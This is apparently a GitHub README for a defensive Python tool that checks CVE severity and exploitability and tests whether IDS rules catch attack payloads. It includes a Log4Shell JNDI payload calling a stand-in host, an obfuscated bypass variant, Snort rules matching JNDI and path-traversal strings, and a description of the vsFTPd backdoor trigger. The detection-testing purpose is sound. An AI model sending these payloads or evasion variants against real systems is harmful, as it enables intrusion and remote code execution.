krish-achanta/vuln-validator

GitHub: krish-achanta/vuln-validator

Stars: 0 | Forks: 0

# vuln-validator ![Python](https://img.shields.io/badge/Python-3.8%2B-blue) ![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20Kali-green) ![License](https://img.shields.io/badge/License-MIT-lightgrey) ## What This Tool Does — Plain English Imagine you hear about a vulnerability called Log4Shell (CVE-2021-44228). Before patching or writing a detection rule, a security researcher needs to answer four questions: 1. **How bad is it?** → CVSS score, attack vector, affected products 2. **Can someone actually exploit it?** → Is there a public exploit? A Metasploit module? A PoC on GitHub? Is it being actively exploited in the wild? 3. **Would my IDS/firewall catch it?** → Does the attack payload match any known Snort/Suricata signatures? 4. **What am I missing?** → Which attack variants bypass detection? What should I fix? `vuln-validator` answers all four questions automatically and puts them in an HTML report. ## The Two Ways to Use It ### Method 1: Give it a CVE ID python3 vuln_validator.py --cve CVE-2021-44228 --test-detection --report It fetches the full vulnerability details from the [NIST NVD database](https://nvd.nist.gov), checks exploitability signals, runs detection tests, and produces a gap analysis. ### Method 2: Give it a service banner python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report A **service banner** is what a server tells you about itself when you connect to it. For example, when you run `nmap -sV` against a target, you see things like `Apache/2.4.49` or `OpenSSH_7.2p2`. This tool takes that string, looks it up against a local vulnerability database, finds which CVEs affect that exact version, and then runs the same detection tests. ## Installation git clone https://github.com/krish-achanta/vuln-validator cd vuln-validator pip install -r requirements.txt ## Usage # Validate a CVE with full detection testing and HTML report python3 vuln_validator.py --cve CVE-2021-44228 --test-detection --report # Analyse a service banner grabbed from nmap python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report # Both together — useful when you know both the CVE and the target's banner python3 vuln_validator.py --cve CVE-2021-41773 --banner "Apache/2.4.49" \ --test-detection --report # Offline mode — uses locally cached CVE data (no internet needed after first run) python3 vuln_validator.py --cve CVE-2021-44228 --offline --test-detection --report # Test against a live lab target (sends HTTP probes to the host) python3 vuln_validator.py --cve CVE-2021-44228 --banner "Apache/2.4.49" \ --target 192.168.1.10 --test-detection --report ### Arguments | Argument | Description | |----------|-------------| | `--cve` | CVE ID to validate e.g. `CVE-2021-44228` | | `--banner` | Service banner string e.g. `"Apache/2.4.49"` | | `--target` | Optional IP/host for live HTTP detection tests | | `--test-detection` | Simulate IDS/SIEM signature matching | | `--report` | Generate HTML gap analysis report | | `--offline` | Use cached CVE data only (no NVD API calls) | | `-o` | Output directory (default: `reports/`) | ## CVEs You Can Test Right Now The following CVEs have full detection signatures built in — you get detection test results, evasion analysis, and Snort rules generated automatically: | CVE | Vulnerability | What it does | |-----|--------------|-------------| | `CVE-2021-44228` | **Log4Shell** | JNDI injection in Apache Log4j — one of the most critical CVEs ever found. Affects anything using Log4j 2.x | | `CVE-2021-41773` | **Apache Path Traversal** | Apache 2.4.49 allows reading files outside the web root e.g. `/etc/passwd` | | `CVE-2014-6271` | **Shellshock** | Bash processes attacker-controlled commands in environment variables | | `CVE-2014-0160` | **Heartbleed** | OpenSSL leaks server memory including private keys | | `CVE-2017-0144` | **EternalBlue** | SMB exploit used by WannaCry ransomware — MS17-010 | | `CVE-2020-1938` | **Ghostcat** | Apache Tomcat AJP port leaks/reads arbitrary files | | `CVE-2011-2523` | **vsFTPd Backdoor** | vsFTPd 2.3.4 contains a deliberate backdoor triggered by `:)` in username | | `CVE-2017-7494` | **SambaCry** | Samba arbitrary shared library load — Linux EternalBlue equivalent | **For any other CVE** (e.g. `CVE-2023-44487`, `CVE-2022-30190`) you still get: - Full CVSS score and severity from NVD - Description and affected products - Exploitability signals (Exploit-DB, Metasploit, GitHub PoC, CISA KEV) - A gap flag noting no local detection signature exists # Example — any CVE works for the NVD lookup + exploitability check python3 vuln_validator.py --cve CVE-2023-44487 --report # ^ HTTP/2 Rapid Reset DDoS — you'll get CVSS 7.5, references, exploitability check ## Real Sample Output ### Example 1 — Log4Shell + Apache banner $ python3 vuln_validator.py --cve CVE-2021-44228 --banner "Apache/2.4.49" \ --test-detection --report [*] Looking up CVE-2021-44228 via NVD API... [+] CVE : CVE-2021-44228 [+] CVSS : 10.0 (CRITICAL) [+] CWE : CWE-917, CWE-502 [+] CPEs : 163 affected product entries [+] Published: 2021-12-10 [*] Parsing banner: Apache/2.4.49 [+] Apache HTTP Server 2.4.49 → CVE-2021-42013, CVE-2021-41773 [*] Checking exploitability... [+] Exploit-DB: 3 exploit(s) found for CVE-2021-44228 [+] Metasploit: 4 module file(s) reference CVE-2021-44228 [+] GitHub PoC: 5 repo(s) found (top: tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce) [+] CISA KEV: ⚠ IN CISA KEV LIST — actively exploited in the wild [*] Running detection gap tests... [>] 3 test case(s) to evaluate [+] Log4Shell JNDI Basic (CVE-2021-44228) → DETECTED | EVASION POSSIBLE [+] Log4Shell JNDI RMI (CVE-2021-44228) → DETECTED [+] Apache 2.4.49 Path Traversal (CVE-2021-41773) → DETECTED ════════════════════════════════════════════════════════════ VULNERABILITY VALIDATION SUMMARY ════════════════════════════════════════════════════════════ CVE : CVE-2021-44228 Description : Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features... CVSS Score : 10.0 (CRITICAL) Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Published : 2021-12-10 References : 21 link(s) Banner : Apache/2.4.49 Matched CVEs : CVE-2021-42013, CVE-2021-41773 Exploit DB : ✔ PUBLIC EXPLOIT EXISTS Metasploit : ✔ MODULE EXISTS PoC GitHub : ✔ PoC FOUND CISA KEV : ⚠ IN CISA KEV LIST Risk Rating : CRITICAL Detection Gaps Found : 1 ⚠ [MEDIUM] Log4Shell JNDI Basic: rule fires on base payload but 1 bypass variant evades detection. → Use obfuscation-aware PCRE rules. Detection Coverage : [████████████████████░░░░] 93% ════════════════════════════════════════════════════════════ [+] Report: reports/CVE_2021_44228_20260525/gap_report_CVE_2021_44228.html ### Example 2 — Shellshock (CVE-2014-6271) $ python3 vuln_validator.py --cve CVE-2014-6271 --test-detection --report [*] Checking exploitability for CVE-2014-6271... [*] Running detection gap tests... [>] 1 test case(s) to evaluate [+] Shellshock Basic (CVE-2014-6271) → DETECTED Detection Coverage : [████████████████████] 100% ### Example 3 — EternalBlue (CVE-2017-0144) $ python3 vuln_validator.py --cve CVE-2017-0144 --test-detection --report [!] EternalBlue SMB Negotiation (CVE-2017-0144) → NOT DETECTED Detection Gaps Found : 1 ⚠ [HIGH] No IDS signature available — CVE has no detection test in the local signature library. → Develop a custom Snort/Suricata rule. Detection Coverage : [██████████░░░░░░░░░░] 50% EternalBlue shows up as NOT DETECTED because the detection test requires raw SMB packet inspection — a Snort rule for it is generated in the output but the simulation engine can't fire on SMB binary data without a real packet. This is itself a valid finding: it correctly identifies a detection gap. ### Example 4 — Service banner from nmap output $ python3 vuln_validator.py --banner "vsFTPd 2.3.4" --test-detection --report [*] Parsing banner: vsFTPd 2.3.4 [+] vsFTPd 2.3.4 → CVE-2011-2523 [*] Running detection gap tests... [+] vsFTPd 2.3.4 Backdoor Trigger (CVE-2011-2523) → DETECTED Detection Coverage : [████████████████████] 100% `vsFTPd 2.3.4` is famous — it contains a deliberate backdoor. Anyone connecting to it and sending a username ending in `:)` gets a root shell on port 6200. The detection signature correctly identifies it. ## Understanding the Gap Analysis The gap analysis scores **7 detection checks** and combines them into a coverage percentage: Check 1 — Exploit-DB coverage Does a public exploit exist AND would your IDS fire on it? If Exploit-DB has an exploit but detection missed it → GAP flagged Check 2 — Metasploit coverage Is there an MSF module AND would it be caught? Metasploit payloads have specific signatures — some IDS rulesets miss them Check 3 — CISA KEV + detection Is this vulnerability actively being exploited in the wild (CISA KEV list)? If yes AND detection failed → CRITICAL gap Check 4 — Evasion bypass Does obfuscating the payload (e.g. URL encoding, case variation, nested substitution) bypass the detection rule? Example: ${jndi:ldap://evil.com/a} → DETECTED ${${::-j}${::-n}${::-d}i:ldap://evil.com/a} → NOT DETECTED ← GAP Check 5 — No signature at all CVE exists and has exploits but zero detection rules cover it Check 6 — High CVSS + no detection CVSS score ≥ 7.0 but no detection test was available Check 7 — Public PoC + detection gap PoC exists on GitHub but detection may not cover all PoC variants **Coverage % = weighted average of passed checks + detection test pass rate** A score of 100% means every known attack vector for that CVE would be caught by the generated Snort rules. 50% means half would slip through. ## Generated Snort/Suricata Rules Every `--test-detection` run outputs a `.rules` file you can load into Snort or Suricata: # vuln-validator generated Snort/Suricata rules # Review and tune before deploying to production alert tcp any any -> any any ( msg:"CVE-2021-44228 - Log4Shell JNDI Basic"; content:"${jndi:"; classtype:attempted-admin; sid:9067573; rev:1; ) alert tcp any any -> any any ( msg:"CVE-2021-44228 - Log4Shell JNDI RMI"; content:"jndi:rmi"; classtype:attempted-admin; sid:9016568; rev:1; ) alert tcp any any -> any any ( msg:"CVE-2021-41773 - Apache 2.4.49 Path Traversal"; content:".%2e/"; pcre:"/\.%2e\/.*etc\/passwd/i"; classtype:attempted-admin; sid:9088064; rev:1; ) To test these in Suricata on Kali: suricata -c /etc/suricata/suricata.yaml \ -S reports/CVE_2021_44228_20260525/detection_rules.rules \ -r your_pcap_file.pcap ## Output Structure reports/ └── CVE_2021_44228_20260525_070509/ ├── CVE-2021-44228_nvd.json ← Raw NVD API response (CVSS, CPEs, refs) ├── banner_match.json ← Banner parse results ├── detection_results.json ← Per-test detection pass/fail + evasion ├── detection_rules.rules ← Generated Snort/Suricata rules └── gap_report_CVE_2021_44228.html ← Full HTML report (open in Firefox) ## How to Use the Banner (nmap workflow) A typical penetration test workflow combining nmap and vuln-validator: # Step 1 — Scan the target with nmap service detection nmap -sV 192.168.1.10 # nmap output shows: # 21/tcp open ftp vsftpd 2.3.4 # 80/tcp open http Apache httpd 2.4.49 # 22/tcp open ssh OpenSSH 7.2p2 # Step 2 — Feed each banner into vuln-validator python3 vuln_validator.py --banner "vsftpd 2.3.4" --test-detection --report python3 vuln_validator.py --banner "Apache/2.4.49" --test-detection --report python3 vuln_validator.py --banner "OpenSSH_7.2p2" --test-detection --report # Step 3 — Open the HTML reports in Firefox firefox reports/*/gap_report_*.html ## Legal Disclaimer ## Author [krish-achanta](https://github.com/krish-achanta)